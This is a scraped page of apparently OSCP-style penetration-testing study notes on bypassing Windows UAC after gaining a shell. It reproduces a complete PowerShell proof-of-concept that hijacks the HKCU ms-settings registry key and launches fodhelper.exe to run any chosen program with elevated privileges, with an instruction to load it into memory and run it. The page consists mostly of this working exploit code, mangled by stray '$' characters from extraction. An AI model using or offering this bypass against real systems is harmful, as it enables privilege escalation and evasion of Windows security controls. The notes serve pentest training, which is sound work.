// notes/ Pivoting & Tunneling
🚀
Av Evasion Bypassing UAC
You might pop a shell on a domain user account that is an Administrator on the local computer but since it's just an interactive shell you can't run anything with the Administrato…
#post exploitation#adot8
source · oscp.adot8.com · post-exploitation/av-evasion_bypassing-uac ↗Bypassing UAC
You might pop a shell on a domain user account that is an Administrator on the local computer but since it's just an interactive shell you can't run anything with the Administrator tokens/privileges because of UAC
{% embed url="https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1" %}
powershell
$<#$.SYNOPSIS $ This script is a proof of concept to bypass the User Access Control (UAC) via fodhelper.exe$ $ It creates a new registry structure in: "HKCU:\Software\Classes\ms-settings\" to perform an UAC bypass to start any application. $ $ ATTENTION: Do not try this on your productive machine! $ $ $.NOTES $ Function : FodhelperBypass$ File Name : FodhelperBypass.ps1 $ Author : Christian B. - winscripting.blog $ $ $.LINK $ $ https://github.com/winscripting/UAC-bypass$ $.EXAMPLE $ $ Load "cmd.exe /c powershell.exe" (it's default):$ FodhelperBypass $ $ Load specific application:$ FodhelperBypass -program "cmd.exe"$ FodhelperBypass -program "cmd.exe /c powershell.exe"$ $ $#>$ $function FodhelperBypass(){ $ Param ($ $ [String]$program = "cmd /c start powershell.exe" #default$ )$ $ #Create registry structure$ New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force$ New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force$ Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $program -Force$ $ #Perform the bypass$ Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden$ $ #Remove registry structure$ Start-Sleep 3$ Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force$ $}$ $ Upload this script into memory and run it
powershell
$FodhelperBypass{% hint style="info" %} This must be in a RDP sessions {% endhint %}